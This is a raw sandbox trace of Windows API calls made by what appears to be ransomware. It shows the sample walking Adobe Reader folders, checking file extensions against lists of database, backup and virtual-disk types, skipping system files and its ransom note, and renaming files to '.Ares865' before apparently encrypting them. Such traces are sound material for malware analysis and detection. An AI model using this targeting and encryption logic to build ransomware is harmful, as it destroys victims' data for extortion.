[0154.187] lstrlenW (lpString="ns3") returned 3 [0154.187] lstrcmpiW (lpString1="htm", lpString2="ns3") returned -1 [0154.187] lstrlenW (lpString="ns4") returned 3 [0154.187] lstrcmpiW (lpString1="htm", lpString2="ns4") returned -1 [0154.187] lstrlenW (lpString="nsf") returned 3 [0154.187] lstrcmpiW (lpString1="htm", lpString2="nsf") returned -1 [0154.187] lstrlenW (lpString="nv") returned 2 [0154.187] lstrcmpiW (lpString1="tm", lpString2="nv") returned 1 [0154.187] lstrlenW (lpString="nv2") returned 3 [0154.188] lstrcmpiW (lpString1="htm", lpString2="nv2") returned -1 [0154.188] lstrlenW (lpString="nwdb") returned 4 [0154.188] lstrcmpiW (lpString1=".htm", lpString2="nwdb") returned -1 [0154.188] lstrlenW (lpString="nyf") returned 3 [0154.188] lstrcmpiW (lpString1="htm", lpString2="nyf") returned -1 [0154.188] lstrlenW (lpString="odb") returned 3 [0154.188] lstrcmpiW (lpString1="htm", lpString2="odb") returned -1 [0154.188] lstrlenW (lpString="odb") returned 3 [0154.188] lstrcmpiW (lpString1="htm", lpString2="odb") returned -1 [0154.188] lstrlenW (lpString="oqy") returned 3 [0154.188] lstrcmpiW (lpString1="htm", lpString2="oqy") returned -1 [0154.188] lstrlenW (lpString="ora") returned 3 [0154.188] lstrcmpiW (lpString1="htm", lpString2="ora") returned -1 [0154.188] lstrlenW (lpString="orx") returned 3 [0154.188] lstrcmpiW (lpString1="htm", lpString2="orx") returned -1 [0154.188] lstrlenW (lpString="owc") returned 3 [0154.188] lstrcmpiW (lpString1="htm", lpString2="owc") returned -1 [0154.188] lstrlenW (lpString="p96") returned 3 [0154.188] lstrcmpiW (lpString1="htm", lpString2="p96") returned -1 [0154.188] lstrlenW (lpString="p97") returned 3 [0154.188] lstrcmpiW (lpString1="htm", lpString2="p97") returned -1 [0154.188] lstrlenW (lpString="pan") returned 3 [0154.188] lstrcmpiW (lpString1="htm", lpString2="pan") returned -1 [0154.188] lstrlenW (lpString="pdb") returned 3 [0154.188] lstrcmpiW (lpString1="htm", lpString2="pdb") returned -1 [0154.188] lstrlenW (lpString="pdm") returned 3 [0154.188] lstrcmpiW (lpString1="htm", lpString2="pdm") returned -1 [0154.188] lstrlenW (lpString="pnz") returned 3 [0154.188] lstrcmpiW (lpString1="htm", lpString2="pnz") returned -1 [0154.188] lstrlenW (lpString="qry") returned 3 [0154.188] lstrcmpiW (lpString1="htm", lpString2="qry") returned -1 [0154.188] lstrlenW (lpString="qvd") returned 3 [0154.188] lstrcmpiW (lpString1="htm", lpString2="qvd") returned -1 [0154.188] lstrlenW (lpString="rbf") returned 3 [0154.188] lstrcmpiW (lpString1="htm", lpString2="rbf") returned -1 [0154.189] lstrlenW (lpString="rctd") returned 4 [0154.189] lstrcmpiW (lpString1=".htm", lpString2="rctd") returned -1 [0154.189] lstrlenW (lpString="rod") returned 3 [0154.189] lstrcmpiW (lpString1="htm", lpString2="rod") returned -1 [0154.189] lstrlenW (lpString="rodx") returned 4 [0154.189] lstrcmpiW (lpString1=".htm", lpString2="rodx") returned -1 [0154.189] lstrlenW (lpString="rpd") returned 3 [0154.189] lstrcmpiW (lpString1="htm", lpString2="rpd") returned -1 [0154.189] lstrlenW (lpString="rsd") returned 3 [0154.189] lstrcmpiW (lpString1="htm", lpString2="rsd") returned -1 [0154.189] lstrlenW (lpString="sas7bdat") returned 8 [0154.189] lstrcmpiW (lpString1="ioku.htm", lpString2="sas7bdat") returned -1 [0154.189] lstrlenW (lpString="sbf") returned 3 [0154.189] lstrcmpiW (lpString1="htm", lpString2="sbf") returned -1 [0154.189] lstrlenW (lpString="scx") returned 3 [0154.189] lstrcmpiW (lpString1="htm", lpString2="scx") returned -1 [0154.189] lstrlenW (lpString="sdb") returned 3 [0154.189] lstrcmpiW (lpString1="htm", lpString2="sdb") returned -1 [0154.189] lstrlenW (lpString="sdc") returned 3 [0154.189] lstrcmpiW (lpString1="htm", lpString2="sdc") returned -1 [0154.189] lstrlenW (lpString="sdf") returned 3 [0154.189] lstrcmpiW (lpString1="htm", lpString2="sdf") returned -1 [0154.189] lstrlenW (lpString="sis") returned 3 [0154.189] lstrcmpiW (lpString1="htm", lpString2="sis") returned -1 [0154.189] lstrlenW (lpString="spq") returned 3 [0154.189] lstrcmpiW (lpString1="htm", lpString2="spq") returned -1 [0154.189] lstrlenW (lpString="te") returned 2 [0154.189] lstrcmpiW (lpString1="tm", lpString2="te") returned 1 [0154.189] lstrlenW (lpString="teacher") returned 7 [0154.189] lstrcmpiW (lpString1="oku.htm", lpString2="teacher") returned -1 [0154.189] lstrlenW (lpString="tmd") returned 3 [0154.189] lstrcmpiW (lpString1="htm", lpString2="tmd") returned -1 [0154.189] lstrlenW (lpString="tps") returned 3 [0154.189] lstrcmpiW (lpString1="htm", lpString2="tps") returned -1 [0154.189] lstrlenW (lpString="trc") returned 3 [0154.190] lstrcmpiW (lpString1="htm", lpString2="trc") returned -1 [0154.190] lstrlenW (lpString="trc") returned 3 [0154.190] lstrcmpiW (lpString1="htm", lpString2="trc") returned -1 [0154.190] lstrlenW (lpString="trm") returned 3 [0154.190] lstrcmpiW (lpString1="htm", lpString2="trm") returned -1 [0154.190] lstrlenW (lpString="udb") returned 3 [0154.190] lstrcmpiW (lpString1="htm", lpString2="udb") returned -1 [0154.190] lstrlenW (lpString="udl") returned 3 [0154.190] lstrcmpiW (lpString1="htm", lpString2="udl") returned -1 [0154.190] lstrlenW (lpString="usr") returned 3 [0154.190] lstrcmpiW (lpString1="htm", lpString2="usr") returned -1 [0154.190] lstrlenW (lpString="v12") returned 3 [0154.190] lstrcmpiW (lpString1="htm", lpString2="v12") returned -1 [0154.190] lstrlenW (lpString="vis") returned 3 [0154.190] lstrcmpiW (lpString1="htm", lpString2="vis") returned -1 [0154.190] lstrlenW (lpString="vpd") returned 3 [0154.190] lstrcmpiW (lpString1="htm", lpString2="vpd") returned -1 [0154.190] lstrlenW (lpString="vvv") returned 3 [0154.190] lstrcmpiW (lpString1="htm", lpString2="vvv") returned -1 [0154.190] lstrlenW (lpString="wdb") returned 3 [0154.190] lstrcmpiW (lpString1="htm", lpString2="wdb") returned -1 [0154.190] lstrlenW (lpString="wmdb") returned 4 [0154.190] lstrcmpiW (lpString1=".htm", lpString2="wmdb") returned -1 [0154.190] lstrlenW (lpString="wrk") returned 3 [0154.190] lstrcmpiW (lpString1="htm", lpString2="wrk") returned -1 [0154.190] lstrlenW (lpString="xdb") returned 3 [0154.190] lstrcmpiW (lpString1="htm", lpString2="xdb") returned -1 [0154.190] lstrlenW (lpString="xld") returned 3 [0154.190] lstrcmpiW (lpString1="htm", lpString2="xld") returned -1 [0154.190] lstrlenW (lpString="xmlff") returned 5 [0154.190] lstrcmpiW (lpString1="u.htm", lpString2="xmlff") returned -1 [0154.190] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm.Ares865") returned 60 [0154.190] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\benioku.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\benioku.htm.ares865"), dwFlags=0x1) returned 1 [0154.193] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\benioku.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.193] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17000) returned 1 [0154.193] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.193] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.193] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.193] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.195] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.195] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.195] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4570, lpName=0x0) returned 0x170 [0154.197] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4570) returned 0x190000 [0154.198] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.199] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.199] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.199] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.199] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.199] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.199] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.199] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.199] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.199] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0154.199] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.199] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0154.200] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.200] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.200] CloseHandle (hObject=0x170) returned 1 [0154.200] CloseHandle (hObject=0x118) returned 1 [0154.200] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.200] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.200] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.200] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42ba, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Berime.htm", cAlternateFileName="")) returned 1 [0154.200] lstrcmpiW (lpString1="Berime.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0154.200] lstrcmpiW (lpString1="Berime.htm", lpString2="aoldtz.exe") returned 1 [0154.201] lstrcmpiW (lpString1="Berime.htm", lpString2=".") returned 1 [0154.201] lstrcmpiW (lpString1="Berime.htm", lpString2="..") returned 1 [0154.201] lstrcmpiW (lpString1="Berime.htm", lpString2="windows") returned -1 [0154.201] lstrcmpiW (lpString1="Berime.htm", lpString2="bootmgr") returned -1 [0154.201] lstrcmpiW (lpString1="Berime.htm", lpString2="temp") returned -1 [0154.201] lstrcmpiW (lpString1="Berime.htm", lpString2="pagefile.sys") returned -1 [0154.201] lstrcmpiW (lpString1="Berime.htm", lpString2="boot") returned -1 [0154.201] lstrcmpiW (lpString1="Berime.htm", lpString2="ids.txt") returned -1 [0154.201] lstrcmpiW (lpString1="Berime.htm", lpString2="ntuser.dat") returned -1 [0154.201] lstrcmpiW (lpString1="Berime.htm", lpString2="perflogs") returned -1 [0154.201] lstrcmpiW (lpString1="Berime.htm", lpString2="MSBuild") returned -1 [0154.201] lstrlenW (lpString="Berime.htm") returned 10 [0154.201] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm") returned 52 [0154.201] lstrcpyW (in: lpString1=0x2cce452, lpString2="Berime.htm" | out: lpString1="Berime.htm") returned="Berime.htm" [0154.201] lstrlenW (lpString="Berime.htm") returned 10 [0154.201] lstrlenW (lpString="Ares865") returned 7 [0154.201] lstrcmpiW (lpString1="ime.htm", lpString2="Ares865") returned 1 [0154.201] lstrlenW (lpString=".dll") returned 4 [0154.201] lstrcmpiW (lpString1="Berime.htm", lpString2=".dll") returned 1 [0154.201] lstrlenW (lpString=".lnk") returned 4 [0154.201] lstrcmpiW (lpString1="Berime.htm", lpString2=".lnk") returned 1 [0154.201] lstrlenW (lpString=".ini") returned 4 [0154.201] lstrcmpiW (lpString1="Berime.htm", lpString2=".ini") returned 1 [0154.201] lstrlenW (lpString=".sys") returned 4 [0154.201] lstrcmpiW (lpString1="Berime.htm", lpString2=".sys") returned 1 [0154.201] lstrlenW (lpString="Berime.htm") returned 10 [0154.201] lstrlenW (lpString="bak") returned 3 [0154.201] lstrcmpiW (lpString1="htm", lpString2="bak") returned 1 [0154.201] lstrlenW (lpString="ba_") returned 3 [0154.201] lstrcmpiW (lpString1="htm", lpString2="ba_") returned 1 [0154.201] lstrlenW (lpString="dbb") returned 3 [0154.201] lstrcmpiW (lpString1="htm", lpString2="dbb") returned 1 [0154.201] lstrlenW (lpString="vmdk") returned 4 [0154.201] lstrcmpiW (lpString1=".htm", lpString2="vmdk") returned -1 [0154.201] lstrlenW (lpString="rar") returned 3 [0154.201] lstrcmpiW (lpString1="htm", lpString2="rar") returned -1 [0154.202] lstrlenW (lpString="zip") returned 3 [0154.202] lstrcmpiW (lpString1="htm", lpString2="zip") returned -1 [0154.202] lstrlenW (lpString="tgz") returned 3 [0154.202] lstrcmpiW (lpString1="htm", lpString2="tgz") returned -1 [0154.202] lstrlenW (lpString="vbox") returned 4 [0154.202] lstrcmpiW (lpString1=".htm", lpString2="vbox") returned -1 [0154.202] lstrlenW (lpString="vdi") returned 3 [0154.202] lstrcmpiW (lpString1="htm", lpString2="vdi") returned -1 [0154.202] lstrlenW (lpString="vhd") returned 3 [0154.202] lstrcmpiW (lpString1="htm", lpString2="vhd") returned -1 [0154.202] lstrlenW (lpString="vhdx") returned 4 [0154.202] lstrcmpiW (lpString1=".htm", lpString2="vhdx") returned -1 [0154.202] lstrlenW (lpString="avhd") returned 4 [0154.202] lstrcmpiW (lpString1=".htm", lpString2="avhd") returned -1 [0154.202] lstrlenW (lpString="db") returned 2 [0154.202] lstrcmpiW (lpString1="tm", lpString2="db") returned 1 [0154.202] lstrlenW (lpString="db2") returned 3 [0154.202] lstrcmpiW (lpString1="htm", lpString2="db2") returned 1 [0154.202] lstrlenW (lpString="db3") returned 3 [0154.202] lstrcmpiW (lpString1="htm", lpString2="db3") returned 1 [0154.202] lstrlenW (lpString="dbf") returned 3 [0154.202] lstrcmpiW (lpString1="htm", lpString2="dbf") returned 1 [0154.202] lstrlenW (lpString="mdf") returned 3 [0154.202] lstrcmpiW (lpString1="htm", lpString2="mdf") returned -1 [0154.202] lstrlenW (lpString="mdb") returned 3 [0154.202] lstrcmpiW (lpString1="htm", lpString2="mdb") returned -1 [0154.202] lstrlenW (lpString="sql") returned 3 [0154.202] lstrcmpiW (lpString1="htm", lpString2="sql") returned -1 [0154.202] lstrlenW (lpString="sqlite") returned 6 [0154.202] lstrcmpiW (lpString1="me.htm", lpString2="sqlite") returned -1 [0154.202] lstrlenW (lpString="sqlite3") returned 7 [0154.202] lstrcmpiW (lpString1="ime.htm", lpString2="sqlite3") returned -1 [0154.202] lstrlenW (lpString="sqlitedb") returned 8 [0154.202] lstrcmpiW (lpString1="rime.htm", lpString2="sqlitedb") returned -1 [0154.202] lstrlenW (lpString="xml") returned 3 [0154.203] lstrcmpiW (lpString1="htm", lpString2="xml") returned -1 [0154.203] lstrlenW (lpString="$er") returned 3 [0154.203] lstrcmpiW (lpString1="htm", lpString2="$er") returned 1 [0154.203] lstrlenW (lpString="4dd") returned 3 [0154.203] lstrcmpiW (lpString1="htm", lpString2="4dd") returned 1 [0154.203] lstrlenW (lpString="4dl") returned 3 [0154.203] lstrcmpiW (lpString1="htm", lpString2="4dl") returned 1 [0154.203] lstrlenW (lpString="^^^") returned 3 [0154.203] lstrcmpiW (lpString1="htm", lpString2="^^^") returned 1 [0154.203] lstrlenW (lpString="abs") returned 3 [0154.203] lstrcmpiW (lpString1="htm", lpString2="abs") returned 1 [0154.203] lstrlenW (lpString="abx") returned 3 [0154.203] lstrcmpiW (lpString1="htm", lpString2="abx") returned 1 [0154.203] lstrlenW (lpString="accdb") returned 5 [0154.203] lstrcmpiW (lpString1="e.htm", lpString2="accdb") returned 1 [0154.203] lstrlenW (lpString="accdc") returned 5 [0154.203] lstrcmpiW (lpString1="e.htm", lpString2="accdc") returned 1 [0154.203] lstrlenW (lpString="accde") returned 5 [0154.203] lstrcmpiW (lpString1="e.htm", lpString2="accde") returned 1 [0154.203] lstrlenW (lpString="accdr") returned 5 [0154.203] lstrcmpiW (lpString1="e.htm", lpString2="accdr") returned 1 [0154.203] lstrlenW (lpString="accdt") returned 5 [0154.203] lstrcmpiW (lpString1="e.htm", lpString2="accdt") returned 1 [0154.203] lstrlenW (lpString="accdw") returned 5 [0154.203] lstrcmpiW (lpString1="e.htm", lpString2="accdw") returned 1 [0154.203] lstrlenW (lpString="accft") returned 5 [0154.203] lstrcmpiW (lpString1="e.htm", lpString2="accft") returned 1 [0154.203] lstrlenW (lpString="adb") returned 3 [0154.203] lstrcmpiW (lpString1="htm", lpString2="adb") returned 1 [0154.203] lstrlenW (lpString="adb") returned 3 [0154.203] lstrcmpiW (lpString1="htm", lpString2="adb") returned 1 [0154.203] lstrlenW (lpString="ade") returned 3 [0154.203] lstrcmpiW (lpString1="htm", lpString2="ade") returned 1 [0154.203] lstrlenW (lpString="adf") returned 3 [0154.203] lstrcmpiW (lpString1="htm", lpString2="adf") returned 1 [0154.203] lstrlenW (lpString="adn") returned 3 [0154.203] lstrcmpiW (lpString1="htm", lpString2="adn") returned 1 [0154.204] lstrlenW (lpString="adp") returned 3 [0154.204] lstrcmpiW (lpString1="htm", lpString2="adp") returned 1 [0154.204] lstrlenW (lpString="alf") returned 3 [0154.204] lstrcmpiW (lpString1="htm", lpString2="alf") returned 1 [0154.204] lstrlenW (lpString="ask") returned 3 [0154.204] lstrcmpiW (lpString1="htm", lpString2="ask") returned 1 [0154.204] lstrlenW (lpString="btr") returned 3 [0154.204] lstrcmpiW (lpString1="htm", lpString2="btr") returned 1 [0154.204] lstrlenW (lpString="cat") returned 3 [0154.204] lstrcmpiW (lpString1="htm", lpString2="cat") returned 1 [0154.204] lstrlenW (lpString="cdb") returned 3 [0154.204] lstrcmpiW (lpString1="htm", lpString2="cdb") returned 1 [0154.204] lstrlenW (lpString="ckp") returned 3 [0154.204] lstrcmpiW (lpString1="htm", lpString2="ckp") returned 1 [0154.204] lstrlenW (lpString="cma") returned 3 [0154.204] lstrcmpiW (lpString1="htm", lpString2="cma") returned 1 [0154.204] lstrlenW (lpString="cpd") returned 3 [0154.204] lstrcmpiW (lpString1="htm", lpString2="cpd") returned 1 [0154.204] lstrlenW (lpString="dacpac") returned 6 [0154.204] lstrcmpiW (lpString1="me.htm", lpString2="dacpac") returned 1 [0154.204] lstrlenW (lpString="dad") returned 3 [0154.204] lstrcmpiW (lpString1="htm", lpString2="dad") returned 1 [0154.204] lstrlenW (lpString="dadiagrams") returned 10 [0154.204] lstrlenW (lpString="daschema") returned 8 [0154.204] lstrcmpiW (lpString1="rime.htm", lpString2="daschema") returned 1 [0154.204] lstrlenW (lpString="db-journal") returned 10 [0154.204] lstrlenW (lpString="db-shm") returned 6 [0154.204] lstrcmpiW (lpString1="me.htm", lpString2="db-shm") returned 1 [0154.204] lstrlenW (lpString="db-wal") returned 6 [0154.204] lstrcmpiW (lpString1="me.htm", lpString2="db-wal") returned 1 [0154.204] lstrlenW (lpString="dbc") returned 3 [0154.204] lstrcmpiW (lpString1="htm", lpString2="dbc") returned 1 [0154.204] lstrlenW (lpString="dbs") returned 3 [0154.204] lstrcmpiW (lpString1="htm", lpString2="dbs") returned 1 [0154.204] lstrlenW (lpString="dbt") returned 3 [0154.204] lstrcmpiW (lpString1="htm", lpString2="dbt") returned 1 [0154.204] lstrlenW (lpString="dbv") returned 3 [0154.204] lstrcmpiW (lpString1="htm", lpString2="dbv") returned 1 [0154.205] lstrlenW (lpString="dbx") returned 3 [0154.205] lstrcmpiW (lpString1="htm", lpString2="dbx") returned 1 [0154.205] lstrlenW (lpString="dcb") returned 3 [0154.205] lstrcmpiW (lpString1="htm", lpString2="dcb") returned 1 [0154.205] lstrcmpiW (lpString1="htm", lpString2="dct") returned 1 [0154.206] lstrcmpiW (lpString1="htm", lpString2="dcx") returned 1 [0154.206] lstrcmpiW (lpString1="htm", lpString2="ddl") returned 1 [0154.207] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm.Ares865") returned 59 [0154.207] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\berime.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\berime.htm.ares865"), dwFlags=0x1) returned 1 [0154.210] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\berime.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.210] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17082) returned 1 [0154.210] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.210] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.210] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.210] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.211] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.211] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.211] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x45c0, lpName=0x0) returned 0x170 [0154.212] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x45c0) returned 0x190000 [0154.214] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.215] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.215] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.215] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.215] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.215] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.215] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.215] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.215] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.215] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0154.215] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.215] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0154.215] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.215] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.215] CloseHandle (hObject=0x170) returned 1 [0154.216] CloseHandle (hObject=0x118) returned 1 [0154.216] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.216] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.216] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.216] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffe6ce0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x562de240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x562de240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Esl", cAlternateFileName="")) returned 1 [0154.216] lstrcmpiW (lpString1="Esl", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0154.216] lstrcmpiW (lpString1="Esl", lpString2="aoldtz.exe") returned 1 [0154.216] lstrcmpiW (lpString1="Esl", lpString2=".") returned 1 [0154.216] lstrcmpiW (lpString1="Esl", lpString2="..") returned 1 [0154.216] lstrcmpiW (lpString1="Esl", lpString2="windows") returned -1 [0154.216] lstrcmpiW (lpString1="Esl", lpString2="bootmgr") returned 1 [0154.216] lstrcmpiW (lpString1="Esl", lpString2="temp") returned -1 [0154.216] lstrcmpiW (lpString1="Esl", lpString2="pagefile.sys") returned -1 [0154.216] lstrcmpiW (lpString1="Esl", lpString2="boot") returned 1 [0154.216] lstrcmpiW (lpString1="Esl", lpString2="ids.txt") returned -1 [0154.216] lstrcmpiW (lpString1="Esl", lpString2="ntuser.dat") returned -1 [0154.216] lstrcmpiW (lpString1="Esl", lpString2="perflogs") returned -1 [0154.216] lstrcmpiW (lpString1="Esl", lpString2="MSBuild") returned -1 [0154.216] lstrlenW (lpString="Esl") returned 3 [0154.216] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm") returned 51 [0154.216] lstrcpyW (in: lpString1=0x2cce452, lpString2="Esl" | out: lpString1="Esl") returned="Esl" [0154.216] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e78c8 [0154.216] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5a) returned 0x2f1fc8 [0154.217] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e78d0 | out: ListHead=0x2e7710, ListEntry=0x2e78d0) returned 0x2e78b0 [0154.217] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53e1eea0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x53e1eea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0154.217] 